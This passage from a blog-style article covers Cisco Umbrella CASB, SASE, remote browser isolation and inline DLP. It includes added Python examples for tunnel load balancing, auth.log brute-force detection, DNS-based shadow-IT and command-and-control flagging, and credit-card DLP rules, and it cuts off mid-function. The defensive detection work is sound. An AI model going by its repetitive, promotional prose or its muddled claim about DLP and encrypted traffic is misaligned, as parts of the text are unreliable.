You will also want to monitor IPsec tunnel health during brownouts, which an underlying transport issue can cause, and dynamically steer traffic onto the better-performing tunnels. Cisco provides an L7 tracker with a custom SLA for this. The tracker sends an HTTP probe to the Umbrella service endpoint (service.sig.umbrella.com) through each tunnel, measures the round-trip latency, and compares it to the SLA you configured. Tunnels that fail to meet the SLA are marked down by the tracker, and traffic moves to the tunnels that remain up. Because this is an end-to-end HTTP probe rather than an IPsec dead-peer check, it also catches a tunnel that is up at the IPsec layer but cannot reach the service behind it.
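The weighted per-flow balancing and the L7 tracker described in the two passages above, combined in one added Python example (illustrative, not Cisco's implementation): the 4-tuple is hashed to pin each flow to a tunnel, weights give 80:20 or equal-cost distribution, a simplified tracker marks a tunnel down after consecutive probes breach the SLA so flows re-hash across what is left, and a capacity helper shows why four 250 Mbps tunnels give 1 Gbps aggregate but 250 Mbps per flow. The hash function (SHA-256 here), tunnel names, weights and probe values are assumptions.

```python
"""Per-flow SIG tunnel selection and a simplified L7 SLA tracker: an added
example, not Cisco's implementation. Flows are pinned by hashing the 4-tuple
(SHA-256 here; the platform's hash is an internal detail); weights give
weighted or equal-cost distribution; consecutive bad probes mark a tunnel
down. Tunnel names, weights and probe results are constructed."""
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class SigTunnel:
    name: str
    weight: int = 1                  # relative share of flows
    capacity_mbps: int = 250         # per-tunnel limit quoted in the text
    up: bool = True
    probes: List[Optional[float]] = field(default_factory=list)   # RTT ms; None = probe lost


def flow_key(proto: str, src: str, sport: int, dst: str, dport: int) -> str:
    return f"{proto}:{src}:{sport}->{dst}:{dport}"


def pick_tunnel(tunnels: List[SigTunnel], flow: str) -> Optional[str]:
    """Deterministic weighted choice: the same flow lands on the same tunnel
    for as long as the set of live tunnels does not change."""
    alive = [t for t in tunnels if t.up]
    if not alive:
        return None
    digest = hashlib.sha256(flow.encode()).digest()
    bucket = int.from_bytes(digest[:8], "big") % sum(t.weight for t in alive)
    for t in alive:
        if bucket < t.weight:
            return t.name
        bucket -= t.weight
    return alive[-1].name


def tracker_update(t: SigTunnel, rtt_ms: Optional[float],
                   threshold_ms: float = 300, multiplier: int = 3) -> bool:
    """Simplified L7 tracker: a lost probe or one above the SLA threshold is bad;
    `multiplier` consecutive bad probes mark the tunnel down, one good probe
    brings it back. Returns the tunnel's new state."""
    t.probes.append(rtt_ms)
    bad = [r is None or r > threshold_ms for r in t.probes[-multiplier:]]
    if len(bad) == multiplier and all(bad):
        t.up = False
    elif not bad[-1]:
        t.up = True
    return t.up


def distribution(tunnels: List[SigTunnel], n_flows: int = 20000) -> Dict[str, float]:
    """Hash n constructed flows and report the share each live tunnel receives."""
    counts = {t.name: 0 for t in tunnels if t.up}
    for i in range(n_flows):
        flow = flow_key("tcp", f"10.1.{i // 250 % 256}.{i % 250 + 1}", 1024 + i,
                        "198.51.100.10", 443)
        counts[pick_tunnel(tunnels, flow)] += 1
    return {name: c / n_flows for name, c in counts.items()}


def capacity(tunnels: List[SigTunnel]) -> Dict[str, int]:
    """Aggregate throughput grows with live tunnels, but per-flow hashing means
    a single flow never exceeds one tunnel's capacity."""
    alive = [t for t in tunnels if t.up]
    return {"aggregate_mbps": sum(t.capacity_mbps for t in alive),
            "single_flow_max_mbps": max((t.capacity_mbps for t in alive), default=0)}


if __name__ == "__main__":
    ecmp = [SigTunnel(f"sig{i}") for i in range(1, 5)]            # four equal tunnels
    print(capacity(ecmp), distribution(ecmp))
    weighted = [SigTunnel("dia1", weight=4), SigTunnel("dia2", weight=1)]   # 80:20
    print(distribution(weighted))
    for rtt in (120, 480, None, 650):                              # brownout on dia1
        tracker_update(weighted[0], rtt)
    print("dia1 up:", weighted[0].up, distribution(weighted))
```

When a tunnel is marked down, every flow re-hashes against the remaining tunnels, so some flows that were on a healthy tunnel also move; that is the price of a simple modulo hash and is visible in the distribution after the brownout.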

SD-WAN and SASE

Summary: SD WAN SASE

In today’s increasingly digital world, businesses constantly seek innovative solutions to enhance network connectivity and security. SD-WAN SASE (Software-Defined Wide Area Network Secure Access Service Edge) is a groundbreaking technology. In this blog post, we delved into the intricacies of SD-WAN SASE, its benefits, and how it is revolutionizing network connectivity.

Section 1: Understanding SD-WAN

SD-WAN, or Software-Defined Wide Area Network, is a virtualized approach to connecting and managing networks. It allows organizations to efficiently connect multiple locations, whether branch offices, data centers, or cloud-based applications. By leveraging software-defined networking principles, SD-WAN offers enhanced agility, performance, and cost savings compared to traditional WAN solutions.

Section 2: Unveiling SASE

SASE, which stands for Secure Access Service Edge, is a transformative concept that combines network security and WAN capabilities into a unified cloud-based architecture. It enables organizations to consolidate networking and security functions, delivering comprehensive protection and improved performance. SASE replaces the traditional hub-and-spoke network model with a more agile and secure architecture.

Section 3: The Synergy of SD-WAN and SASE

When SD-WAN and SASE are combined, the result is a powerful solution that brings together the benefits of both technologies. SD-WAN provides network agility and scalability, while SASE ensures robust security measures are seamlessly integrated into the network. This synergy enables organizations to optimize their network performance while safeguarding against evolving cybersecurity threats.

Section 4: Benefits of SD-WAN SASE

4.1 Enhanced Performance and User Experience: SD-WAN SASE optimizes traffic routing, ensuring applications and data take the most efficient path. It prioritizes critical applications, resulting in improved performance and user experience.

4.2 Simplified Network Management: The unified architecture of SD-WAN SASE simplifies network management by consolidating various functions into a single platform. This streamlines operations and reduces complexity.

4.3 Enhanced Security: With SASE, security functions are natively integrated into the network. This ensures consistent and comprehensive protection across all locations, devices, and users, regardless of their physical location.

4.4 Cost Savings: SD-WAN SASE reduces the reliance on expensive hardware and dedicated security appliances, resulting in cost savings for organizations.

Conclusion:

In conclusion, SD-WAN SASE is transforming the landscape of network connectivity and security. By combining the agility of SD-WAN and the robustness of SASE, organizations can achieve optimal performance, enhanced security, simplified management, and cost savings. Embracing this innovative technology can empower businesses to stay ahead in the ever-evolving digital world.

Cisco Umbrella CASB

In today's digital landscape, businesses face numerous security challenges. Protecting sensitive data and ensuring compliance with regulations are top priorities. This is where Cisco Umbrella CASB (Cloud Access Security Broker) comes into play. In this blog post, we will explore the key features and benefits of Cisco Umbrella CASB, and how it empowers organizations to secure their cloud environments effectively.

CASB, short for Cloud Access Security Broker, is a critical component of modern cybersecurity strategies. It provides organizations with visibility and control over cloud services, ensuring data protection and compliance. Cisco Umbrella CASB takes this to the next level, offering a comprehensive solution that covers all aspects of cloud security.

Cisco Umbrella CASB boasts a wide range of features that make it a powerful tool for securing cloud environments. From advanced threat protection to data loss prevention, here are some key features that set it apart:

Cloud Application Visibility: Cisco Umbrella CASB provides detailed visibility into all cloud applications in use within an organization. This allows administrators to identify potential risks and enforce policies to mitigate them effectively.

Threat Detection and Response: With its advanced threat detection capabilities, Cisco Umbrella CASB helps organizations identify and respond to potential security breaches promptly. It leverages machine learning algorithms and behavioral analytics to detect anomalous activities and prevent data exfiltration.

Data Loss Prevention (DLP): Protecting sensitive data is a top priority for organizations. Cisco Umbrella CASB enables granular data loss prevention policies, ensuring that confidential information remains protected throughout its lifecycle in the cloud.

One of the significant advantages of Cisco Umbrella CASB is its seamless integration with existing security infrastructure. It can easily integrate with other Cisco security solutions, such as Cisco Secure Email Gateway and Cisco Advanced Malware Protection, providing a unified approach to cloud security.

Compliance with industry regulations is crucial for organizations across various sectors. Cisco Umbrella CASB offers robust compliance and governance features that help organizations meet regulatory requirements. It provides visibility into user activities, enforces policies, and generates detailed compliance reports.

Cisco Umbrella CASB is a game-changer in the realm of cloud security. Its comprehensive features, seamless integration capabilities, and enhanced compliance and governance make it a go-to solution for organizations seeking to secure their cloud environments effectively. By leveraging the power of Cisco Umbrella CASB, businesses can confidently embrace the cloud while safeguarding their valuable data.

Highlights: Cisco Umbrella CASB

Understanding Cisco Umbrella CASB

**Understanding the Basics of Cisco Umbrella CASB**

Cisco Umbrella CASB is designed to provide comprehensive security for cloud applications. It acts as an intermediary between cloud service users and providers, ensuring that data and applications are used securely. By offering visibility and control over user activities, it helps organizations mitigate risks associated with unmanaged devices and shadow IT. Its seamless integration into existing security frameworks makes it a preferred choice for IT administrators looking to enhance their cloud security posture.

**Key Features and Capabilities**

One of the standout features of Cisco Umbrella CASB is its ability to provide detailed insight into cloud service usage. It offers real-time monitoring and analytics, allowing organizations to identify potential threats and vulnerabilities quickly. Additionally, the platform supports advanced threat protection, data loss prevention, and compliance management, ensuring that all cloud activities adhere to regulatory standards. These capabilities make Cisco Umbrella CASB a comprehensive solution for businesses looking to secure their cloud environments.

**Implementing Cisco Umbrella CASB in Your Organization**

Deploying Cisco Umbrella CASB is a straightforward process that can significantly enhance your organization’s cloud security. By integrating with existing security tools and systems, it provides a unified approach to managing cloud access and protecting sensitive data. Organizations can customize policies to meet specific security needs, ensuring a tailored approach to risk management and compliance. This flexibility makes Cisco Umbrella CASB an invaluable asset in the quest for secure cloud operations.

Deployment: CASB Solution

CASBs operate using one of two approaches. Inline CASB solutions sit in the connection path between users and the cloud service, either through a hardware appliance or through an endpoint agent that routes requests through the CASB.

This approach requires the configuration of the network and endpoint devices. However, it provides the advantage of seeing requests before they are sent to the cloud service, allowing the CASB to block submissions that violate policy.

API-based CASB solutions do not interact directly with the user but rather with the cloud provider through the provider’s API. This approach provides direct access to the cloud service and does not require any user device configuration. However, it also does not allow the CASB to block requests that violate policy. As a result, API-based CASBs are limited to monitoring user activity and reporting on or correcting policy violations after the fact.

Key Features and Benefits:

a) Cloud Application Visibility: Cisco Umbrella CASB offers real-time visibility into cloud applications being used within your organization. This enables you to identify shadow IT, assess the risk associated with different applications, and enforce appropriate security policies.

b) Data Loss Prevention: With advanced data loss prevention capabilities, Cisco Umbrella CASB helps prevent unauthorized access, sharing, or leakage of sensitive data. It allows you to define granular policies, monitor data movement, and take proactive measures to mitigate data breaches.

c) Threat Detection and Response: Powered by machine learning and artificial intelligence, Cisco Umbrella CASB proactively detects and blocks threats in real-time. It analyzes user behavior, identifies anomalies, and provides actionable insights to secure your cloud environment against malware, phishing attacks, and other cyber threats.

d) A Platform Approach

We must opt for a platform approach to visibility and control, and more specifically a platform that works in a third-party environment. For cloud security, this is where secure access service edge (SASE) can assist. Cisco's SASE offering is Cisco Umbrella, which comes in several versions depending on your needs. The Cisco Umbrella CASB solution provides a variety of CASB security functions and tools, Data Loss Prevention (DLP), and Umbrella Remote Browser Isolation (RBI), which help you better understand and control your environment.

e) Automatic Discovery and Risk Profiling

Doing this manually means investigating and mapping traffic patterns, data movement, and usage, which is why we need automatic discovery and risk profiling. You need visibility into the applications, files, and data you know about as well as those you do not. You will be amazed by the number of malicious files and data already present in sanctioned applications.

Example Technology: Sensitive Data Protection

Cloud Security Threats

  • Cloud Challenges:

Today’s shared challenge is that organizations need to know what applications they have in their environment. They also need to figure out what to do with specific types of data or how to find users and assign policies to them. These requirements must be met on someone else’s infrastructure, the cloud.

Working in cloud environments, which differ significantly from on-premises ones, involves significant risks. Consider storage, for example: unprotected storage environments pose a much greater security risk in the public cloud than in a private data center.

  • On-premise Data Centers

Within an on-premise private data center, the firewall controls generally restrict direct access to storage, limiting the exposure of an unprotected file to users who already have access to data center systems. On the other hand, an improperly managed storage bucket in the public cloud may be entirely unfiltered for the entire Internet, with only a few clicks by a single person or automated playbooks without role-based access control (RBAC).

Related: For pre-information, you may find the following helpful:

  1. SD WAN SASE
  2. Cisco Secure Firewall
  3. SASE Model
  4. Cisco CloudLock

Cisco Umbrella & SASE

The Role of SASE

The Cisco Umbrella SASE solution offers other security functionality, such as a cloud-delivered Layer 7 firewall, Secure Web Gateway (SWG), DNS-layer security, SD-WAN, and ThousandEyes integration for monitoring and observability. So, we have the traditional security stack you are familiar with, plus enhancements that make it more cloud-friendly. These functions are part of a single SASE solution, managed from the Cisco Umbrella dashboard with API integrations.

The Cisco Umbrella CASB fulfills a variety of CASB security use cases. The use case for the CASB solution depends on where you are in your SASE and cloud security voyage. For example, if you are interested in blocking Malware and content, then Umbrella DNS filtering would be fine.

Umbrella Security Features:

However, you may be looking for additional security requirements. For example, you will need Data Loss Prevention (DLP), Cloud Access Security Brokers (CASB), and Umbrella Remote Browser Isolation (RBI). In that case, we need to move toward Umbrella SIG, which includes Layer 7 Firewalls. Cisco Umbrella offers several packages ranging from DNS Security Essentials to SIG Advantage. More information can be found here: Cisco Umbrella Packages.

1. **Continuous File Monitoring**

Along with these security features, Cisco Umbrella also offers continuous file monitoring: it scans data at rest in sanctioned applications for files that could be malicious. These tools improve your security posture and protect organizations against cloud-specific risks.

The Cisco Umbrella CASB components take you from the initial Discovery to understanding the Risk to maintaining activity by controlling access to specific applications for certain users and actions.

These security activities are carried out by the Cisco Umbrella’s Data Loss Prevention (DLP), Cloud Access Security Brokers (CASB), and Remote Browser Isolation engines.

2. **Umbrella Remote Browser Isolation**

What is Remote Browser Isolation? Browsing the Internet is a dangerous activity. Unfortunately, there is an abundance of threats, including malicious JavaScript, malvertising, exploit kits, and drive-by downloads, all of which target users who interact with web content via their browsers.

Typically, when a user’s browser is compromised, the attacker gains access to the machine the browser runs on. However, the target assets are rarely on the first machine compromised, so attackers commonly proceed to move laterally through the network.

Challenge: Lateral Movements

**Remote Browser Isolation**

Unfortunately, the tools used to move laterally are often legitimate sysadmin tools, so lateral movement can be hard to detect. As a security best practice, it is much better to eliminate the possibility of lateral movement altogether.

However, with Umbrella Remote Browser Isolation (RBI), the remote browser runs in an isolated container in the cloud, thus mitigating the attack surface to an absolute minimum and removing the potential to move laterally.

Therefore, the most sensible thing to do is to isolate the browsing function. With browser isolation technologies, Malware is kept off the end user’s system, reducing the surface area for attack by shifting the risk of attack to the server sessions, which can be reset to a known good state on every new browsing session, tab opened, or URL accessed.

**Redirect Browsings**

Umbrella Remote Browser Isolation protects users from Malware and threats by redirecting browsing to a cloud-based host, which for some is based on a containerized technology. Isolation is achieved by serving web content to users via a remotely spun-up surrogate browser in the cloud.

The Umbrella Remote Browser Isolation allows users to access whatever content they want, such as a web location or document. The user is sent via an isolation engine, which strips away anything that can be malicious, such as Macros or Malware, and then gives them a fully rendered version of the content.

**Rendered Clean Version**

For example, this could be a web app or a website. With remote browser isolation, you scrub away anything that could be malicious and give it a rendered clean version.

So, to the user, it is fully transparent, and they have no idea that they are looking at a rendered version. However, it provides clean and safe content that will not introduce malware into the environment without a performance hit.

Example: Detecting Threats in Logs

Understanding syslog and auth.log

Syslog is a standard protocol for message logging that allows devices to send log messages to a centralized server. Auth.log, on the other hand, is a specific log file that records authentication-related events on Unix-like systems. Familiarizing ourselves with these logs is the first step toward effective security event detection.

Syslog messages can provide valuable insights into security events. By examining their content and structure, we can identify anomalies, such as repeated failed login attempts, suspicious network connections, or unexpected system reboots. Various log analysis tools, like Splunk and ELK stack, offer powerful features to aid this process.

Auth.log is a goldmine for detecting potential security breaches. This log file captures authentication-related events, such as successful logins, failed login attempts, and user privilege escalations. By carefully monitoring auth.log, security analysts can spot unauthorized access attempts, brute-force attacks, or unusual user behavior, enabling them to take timely action to mitigate potential threats.
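The kind of detection the paragraphs above describe, as an added example that is not code from the original post: a small Python analyzer that reads auth.log lines and flags brute-force attempts, a login accepted from a source that had been brute-forcing just before, and sudo privilege escalations. The log lines are constructed samples in the usual OpenSSH and sudo syslog format, and the threshold of five failures is an illustrative choice.

```python
"""Flag brute-force, success-after-brute-force and sudo events in auth.log lines.

Added example, not from the original post. SAMPLE_LOG is constructed;
the regexes follow the common OpenSSH and sudo line formats.
"""
import re
from collections import defaultdict

FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
ACCEPTED = re.compile(
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+) port \d+")
SUDO = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=\S+ ; PWD=\S+ ; USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$")

# Constructed sample: a password-guessing run from 203.0.113.9 that finally
# succeeds, a normal key-based login by alice followed by sudo, and one stray failure.
SAMPLE_LOG = """\
Mar  3 10:00:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.9 port 51122 ssh2
Mar  3 10:00:03 host sshd[1203]: Failed password for root from 203.0.113.9 port 51130 ssh2
Mar  3 10:00:04 host sshd[1205]: Failed password for root from 203.0.113.9 port 51134 ssh2
Mar  3 10:00:06 host sshd[1207]: Failed password for invalid user test from 203.0.113.9 port 51140 ssh2
Mar  3 10:00:08 host sshd[1209]: Failed password for root from 203.0.113.9 port 51144 ssh2
Mar  3 10:00:15 host sshd[1211]: Accepted password for root from 203.0.113.9 port 51150 ssh2
Mar  3 10:05:00 host sshd[1300]: Accepted publickey for alice from 192.0.2.20 port 40000 ssh2
Mar  3 10:05:30 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt update
Mar  3 10:06:00 host sshd[1310]: Failed password for bob from 192.0.2.21 port 40010 ssh2
""".splitlines()


def analyze(lines, threshold: int = 5) -> list:
    """Return findings as tuples; the first element names the finding type."""
    failures = defaultdict(int)        # source IP -> failed attempts
    failed_users = defaultdict(set)    # source IP -> usernames tried
    findings = []
    for line in lines:
        m = FAILED.search(line)
        if m:
            failures[m["ip"]] += 1
            failed_users[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED.search(line)
        if m:
            # A success from a source already over the threshold is the
            # highest-priority signal: the guessing may have worked.
            if failures.get(m["ip"], 0) >= threshold:
                findings.append(("success_after_bruteforce", m["ip"], m["user"]))
            continue
        m = SUDO.search(line)
        if m:
            findings.append(("privilege_escalation", m["user"], m["target"], m["cmd"]))
    for ip, count in failures.items():
        if count >= threshold:
            findings.append(("bruteforce", ip, count, sorted(failed_users[ip])))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

A production detector would also bound the failure count by a time window and de-duplicate repeated sudo findings; the structure stays the same.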

Starting Cisco Umbrella CASB

You can use Cisco Umbrella CASB to discover your actual usage of cloud services through multiple means, such as network monitoring, integration with existing network gateways and monitoring tools or even monitoring Domain Name System (DNS) queries. The CASB solution provides this form of discovery service.

This is the first step to CASB security, understanding both sanctioned and shadow I.T. Once the different services are discovered, a CASB solution can monitor activity on approved services through two standard deployment options.

First, we have an API connection or inline (man-in-the-middle) interception. Some vendors offer a multimode approach. Both deployment modes have their advantages and disadvantages.

The CASB alone is far from a silver bullet and works in combination with other security functions. The power of Cisco Umbrella CASB depends on its Data Loss Prevention (DLP) capabilities, which can be either part of the CASB solution or an external service, depending on the CASB security vendor’s capabilities. The Cisco Umbrella has an inline DLP engine.

Data Loss Prevention

After discovery is performed, CASB security can be used as a preventative control to block access to SaaS products. This functionality, however, is quickly being replaced by the integration of DLP. DLP systems inspect network traffic leaving your systems, looking for sensitive data; traffic carrying unauthorized data is terminated to protect the data from loss and leakage.

Through integration with a DLP service, you can continue to allow access to a SaaS product but control what is being done within that SaaS product. For example, if somebody uses Twitter, you can restrict specific keywords or statements from being sent to the platform.

So, for example, if you’re using an application like Salesforce in the cloud and have a policy that you’re not allowed to copy customers or download customer databases from Salesforce, the CASB solution can enforce that and monitor if someone attempts to download or violate the policies.

Example Technology: IPS IDS

Suricata IPS/IDS has a range of powerful features, making it a formidable defense mechanism for your network. Some of its notable features include:

1. Intrusion Detection: Suricata continuously scans network traffic, analyzing it for any signs of malicious behavior or suspicious activity. It can identify various attacks, such as DDoS attacks, SQL injection, and malware intrusions.

2. Intrusion Prevention: Suricata IPS is a proactive shield that prevents potential threats from infiltrating your network. It can block malicious packets, unauthorized access attempts, and suspicious traffic patterns, effectively neutralizing potential risks.

3. Real-time Alerting: Suricata instantly alerts network administrators or security teams whenever it detects a potential threat. These alerts provide valuable insights and allow for immediate response and mitigation, minimizing the impact of an attack.

Cisco Umbrella CASB: SASE Capabilities

Cisco Umbrella’s CASB, DLP, and Umbrella remote browser isolation (RBI) offering is a core part of Cisco’s overall SASE strategy. The value of CASB security is from its capability to give insight into cloud application use across cloud platforms and identify unsanctioned use.

CASBs use auto-discovery to detect cloud applications and identify high-risk applications and users. In addition, they include DLP functionality and the capability to detect and provide alerts when abnormal user activity occurs to help stop internal and external threats. This enables Cisco Umbrella to expose shadow I.T. by providing the capability to detect and report on the cloud applications used across your environment.

Now, we have a central place for all applications. Cisco Umbrella CASB looks at all your cloud applications and brings them together in a single pane of glass, where you can manage them and see what is happening, provided that functionality already exists. So, instead of going to a hundred different applications and cloud providers, you go to one system, and your CASB solution handles everything.

Pillar1: Visibility 

The CASB security should detect all cloud services, assign each a risk ranking, and identify all users and third-party apps able to log in. More often than not, there are many power users, such as finance, with access to large data sets. Files are shared and exposed through the content of the files used, and apps are installed.

This is generally because a small minority of users control most applications. So these few users introduce a considerable amount of security risk. In addition, they often collaborate with several external parties through cloud-based sharing, not to mention sharing with non-corporate email addresses.

**A key point: Understanding risk**

The first thing you want to do is understand the risk. Here, you can identify risky applications by gaining visibility into any shadow I.T.: apps that admins have no control over or visibility into, yet which are being used in the environment they need to protect.

You can also investigate which identities use these applications and why. How do you gain this visibility, and where does all this data come from? Several sources can be used for discovery, and we discuss them below.

Applications in your environment can be displayed in different categories, with risk broken down by several criteria: business risk, usage risk, and vendor compliance, for example. Each risk category is made up of different factors. Cisco Umbrella CASB integrates with Cisco Talos, which provides reputation information by looking at the host domain and URL associated with the app and tells you whether the app has a good reputation.

Pillar2: Discovery 

To gain visibility, we have to perform discovery. The discovery process involves pulling in and logging data from other security products and then analyzing the information. All of the capabilities to discover apps work out of the box; you only need to direct user traffic to the Umbrella system. The first source is DNS, but discovery also works through the Secure Web Gateway (SWG) proxy and the cloud-delivered firewall.

These SASE engines offer a unique view of sanctioned and unsanctioned applications. So, if you send traffic through one of these Cisco Umbrella engines, it can collect this data automatically. Also, Cisco Umbrella has a Layer 7 application Firewall that can provide information such as application protocols, giving you information on the top-used protocols per application.

Native proxy, Firewall, and DNS logs.

Umbrella has several engines that help with discovery: the native proxy, the firewall, and DNS logs. The user is identified whenever any engine, whether at the DNS or firewall level, picks up the traffic. This gives you a holistic view of each application, such as its associated risk and the identities using it on a per-app basis. So now we can take a broader look at risk: understanding cloud apps, traffic going to malware hosts or command-and-control (C&C) servers, and whether any Tor endpoints are running on your network.
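As an added illustration of log-based discovery (not Umbrella's discovery engine and not code from the post), the Python below takes constructed DNS query log lines, maps each queried name to a cloud application by longest-suffix match against a small constructed catalogue, reports which identities use each app and whether it is sanctioned, and separately flags queries to names the catalogue labels as command-and-control. The log format, domains, app names and risk labels are all constructed for the example.

```python
"""Shadow-IT discovery and C&C flagging from DNS query logs.

Added example, not Umbrella's code. The catalogue, sanctioned list and
log lines are constructed; a real deployment would source the catalogue
from the vendor's application database.
"""
from collections import defaultdict

# Constructed catalogue: registered-domain suffix -> (application, category, risk).
APP_CATALOGUE = {
    "sharepoint.example": ("SharePoint-like", "collaboration", "low"),
    "github.example":     ("GitHub-like",     "development",   "low"),
    "filedrop.example":   ("FileDrop-like",   "file-sharing",  "high"),
    "badhost.example":    ("unknown",         "malware-c2",    "critical"),
}
SANCTIONED_APPS = {"SharePoint-like", "GitHub-like"}

# Constructed log format: "<timestamp> <identity> <qname> <qtype>".
SAMPLE_DNS_LOG = """\
2024-03-03T10:00:01Z alice@corp.example tenant.sharepoint.example A
2024-03-03T10:00:05Z alice@corp.example api.github.example A
2024-03-03T10:01:10Z bob@corp.example upload.filedrop.example A
2024-03-03T10:01:12Z carol@corp.example upload.filedrop.example A
2024-03-03T10:02:00Z dave@corp.example cdn.filedrop.example A
2024-03-03T10:03:30Z bob@corp.example beacon.badhost.example A
2024-03-03T10:04:00Z erin@corp.example www.example.net A
""".splitlines()


def classify_name(qname: str):
    """Longest-suffix match of a queried name against the catalogue, or None."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels) - 1):          # never match a bare TLD
        entry = APP_CATALOGUE.get(".".join(labels[i:]))
        if entry:
            return entry
    return None


def parse_line(line: str):
    ts, identity, qname, qtype = line.split()
    return ts, identity, qname, qtype


def discover(lines) -> dict:
    """Aggregate per-app identities and queries; flag C&C lookups separately."""
    app_users = defaultdict(set)
    app_queries = defaultdict(int)
    app_meta = {}
    threats = []
    for line in lines:
        ts, identity, qname, _ = parse_line(line)
        entry = classify_name(qname)
        if entry is None:
            continue                           # unknown destination: not an app we track
        app, category, risk = entry
        app_meta[app] = (category, risk)
        app_users[app].add(identity)
        app_queries[app] += 1
        if category == "malware-c2":
            threats.append((ts, identity, qname))
    apps = [{"app": app, "category": app_meta[app][0], "risk": app_meta[app][1],
             "sanctioned": app in SANCTIONED_APPS,
             "users": sorted(app_users[app]), "queries": app_queries[app]}
            for app in app_users]
    # Unsanctioned apps first, busiest first: the shadow-IT view an admin wants.
    apps.sort(key=lambda a: (a["sanctioned"], -a["queries"]))
    return {"apps": apps, "threats": threats}


if __name__ == "__main__":
    report = discover(SAMPLE_DNS_LOG)
    for app in report["apps"]:
        print(app)
    print("C&C lookups:", report["threats"])
```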

Pillar 3: Data Security and Control

When dealing with any systematic issue, prevention is critical, with a focus on data protection. A good start would be to define which applications are risky. From there, you can build a workflow and data sets that you need to protect from, for example, data leakage. Once Discovery is performed along with risk assessment, you can prevent unwanted applications in your environment, which is the first step in enforcement.

The first component is the CASB security, followed by DLP to enforce controls. We are creating DLP policies to prevent data leakage. The CASB should be able to identify and control sensitive information. So here, we have DLP features and the capability to respond to classification labels on content.

There is a component called granular control, in which you can allow access to special applications but control different actions for specific applications and users. For example, you can enable access to the app but block uploads.

You can then tie this to an identity so only your finance team can upload it. You can allow, secure, and also isolate. The CASB DLP can operate natively and in conjunction with enterprise DLP products via Internet Content Adaptation Protocol (ICAP) or REST API integration. 

A standard DLP engine for the on-premise and cloud locations will eliminate policy duplication. This Cisco Umbrella solution opts for an inline DLP engine without the need to service chain to an additional appliance.

Pillar 4: Inline Data Loss Prevention

The Data Loss Prevention policy monitors content classified as personally identifiable or sensitive information. When necessary, content is blocked from an upload or a post. With Cisco DLP, there is only one data loss prevention policy.

Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored. For example, an office may want to monitor its network for file uploads that include credit card numbers because the uploads breach company privacy and security policies. A rule that scans the network and uploads to domains can block these files.

Cisco Umbrella: 80 pre-built data Identifiers

There are two primary functions of DLP. The first is identifying and classifying sensitive data; the second is the actions to take. Cisco Umbrella has robust DLP classification with over 80 pre-built data identifiers, backed by detailed reporting on every DLP event. So, when working with DLP, you first select the data classification.

This is where you start your DLP and define the different identifiers for the data. If you are concerned with financial data sets and want to look for credit card numbers, you can choose from the list of pre-built identifiers and then add your own customizations.

The Cisco Umbrella DLP engine also supports regular expressions, which let you match any custom pattern. So we have custom and pre-built identifiers, which are then applied to a DLP policy. As noted, there is only one data loss prevention policy.

Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored.

**Starting a SASE Project**

A) – SASE DLP Starting Points

As a starting point, when considering DLP, there are a couple of best practices to follow. First, you must “train” a DLP to understand what is sensitive data and what is not. Especially with DLP, you should start in monitoring-only mode rather than aggressively blocking: you want to understand what is happening before you start to block.

Sometimes, you want to understand more about data and data ID and where it moves. Second, a DLP cannot inspect encrypted traffic; if it does, check the performance hit. Third, some cloud SDKs and APIs may encrypt portions of data and traffic, which will interfere with the success of a DLP implementation.

B) – SASE Best Practices

As a best practice with Cisco Umbrella, you can start with the pre-built identifiers and create custom dictionaries to monitor your organization’s specific keywords and phrases. Then, you can create specific rules based on the users, groups, devices, and locations whose data you want to watch. Finally, you can choose which destinations and apps you would like to monitor; many organizations choose only to monitor when creating DLP rules and then enable blocking over time.
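To make the DLP policy structure from the Inline Data Loss Prevention section and the monitor-first best practice above concrete, here is an added Python example (not Cisco Umbrella's engine or code). It models one ordered policy: a pre-built identifier (credit card numbers validated with the Luhn check, so not every 16-digit number matches), a custom keyword dictionary, a custom regular-expression identifier, and rules scoped by identity and destination that decide between monitoring and blocking. The rule names, domains, group names, identifier patterns and sample uploads are all constructed.

```python
"""Toy inline DLP policy: classify an upload, then monitor, block or allow it.

Added example, not Cisco Umbrella's code. Identifiers, rules, domains and
sample uploads are constructed.
"""
import re
from dataclasses import dataclass


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: rejects most digit runs that merely look like a card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def find_card_numbers(text: str) -> list:
    """Pre-built identifier: 13 to 19 digits, optional spaces or dashes, Luhn-valid."""
    hits = []
    for m in re.finditer(r"\b(?:\d[ -]?){12,18}\d\b", text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


@dataclass
class Identifier:
    name: str
    kind: str                 # "credit_card" (pre-built), "dictionary" or "regex" (custom)
    pattern: object = None    # word list for dictionary, regex string for regex

    def matches(self, text: str) -> list:
        if self.kind == "credit_card":
            return find_card_numbers(text)
        if self.kind == "dictionary":
            return [w for w in self.pattern
                    if re.search(r"\b" + re.escape(w) + r"\b", text, re.IGNORECASE)]
        return [m.group() for m in re.finditer(self.pattern, text)]


@dataclass
class Rule:
    name: str
    identities: set           # users or groups; {"*"} means any
    destinations: set         # destination domains; {"*"} means any
    identifiers: list
    action: str               # "monitor" or "block"


@dataclass
class Upload:
    user: str
    groups: set
    destination: str
    content: str


def evaluate(policy: list, upload: Upload):
    """First matching rule wins, mirroring one ordered policy. Returns (action, rule, findings)."""
    who = {upload.user} | upload.groups
    for rule in policy:
        if "*" not in rule.identities and not (who & rule.identities):
            continue
        if "*" not in rule.destinations and upload.destination not in rule.destinations:
            continue
        findings = {i.name: i.matches(upload.content) for i in rule.identifiers}
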